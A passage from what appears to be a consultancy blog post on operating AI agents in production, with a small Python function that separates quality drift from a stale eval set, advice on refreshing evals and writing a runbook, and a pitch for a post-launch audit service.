The diagnostic: run your eval pipeline against the current production agent. Compare against the score from launch. If the score has dropped, you have quality drift. If the score is the same but customers are complaining, your eval set has gone stale.
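The decision rule in that diagnostic fits in one small function. The tolerance for what counts as a real drop is a hypothetical parameter; it should reflect the run-to-run noise of your own eval pipeline.

```python
def classify(
    launch_score: float,
    current_score: float,
    complaints_rising: bool,
    tolerance: float = 0.02,  # assumption: drops smaller than this are treated as noise
) -> str:
    """Apply the drift diagnostic: a score drop means drift, a flat score plus complaints means a stale eval set."""
    if launch_score - current_score > tolerance:
        return "quality drift"
    if complaints_rising:
        return "stale eval set"
    return "no drift detected"


print(classify(launch_score=0.90, current_score=0.80, complaints_rising=True))
print(classify(launch_score=0.90, current_score=0.90, complaints_rising=True))
```

The second outcome is the uncomfortable one: the numbers say nothing changed, so the measurement itself has to be rebuilt.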
The fix: refresh the eval set. Sample 50-100 actual production queries, write expected answers for each, run the eval, and tune from there. Most teams refresh eval sets quarterly. Teams in fast-moving domains do it monthly.
The four-hour Friday-night triage:
Customer complaints stopped within 72 hours. The team's mood went from "we built a broken thing" to "we built a thing that needs operational rigor we did not anticipate." That second framing is the one that produces a better product.
The founder's team had no playbook for "the agent is broken in production." They were debugging in panic mode, which slowed every step. After the incident, we wrote a one-page runbook with the four failure modes, the diagnostic for each, and the most common fixes.
Six weeks later, when a similar issue happened (a tool API outage), the on-call engineer worked through the runbook, identified the cause in 20 minutes, applied the documented fix, and was done in an hour. No panic, no escalation, no Friday-night call to a consultant.
This is what production agent operations looks like at maturity. Not "nothing ever goes wrong" but "when things go wrong, the team has a known process to find the cause."
If your team launched an AI agent and the first few weeks have been more painful than expected, the right intervention is usually a forensic audit, not more development. Most launch issues are not new bugs in the agent code. They are operational gaps that surface only at production scale.
Sapota offers a one-week post-launch audit that walks through traces, validation, dependencies, and quality drift, identifies which of the four failure modes is responsible for which symptoms, and ships fixes plus a runbook for future incidents. We have done this for half a dozen B2B SaaS clients in the first three months after their AI launches.
Reach out via the AI engineering page with a description of what your agent does and what kind of failures you are seeing. The first conversation is usually the diagnostic.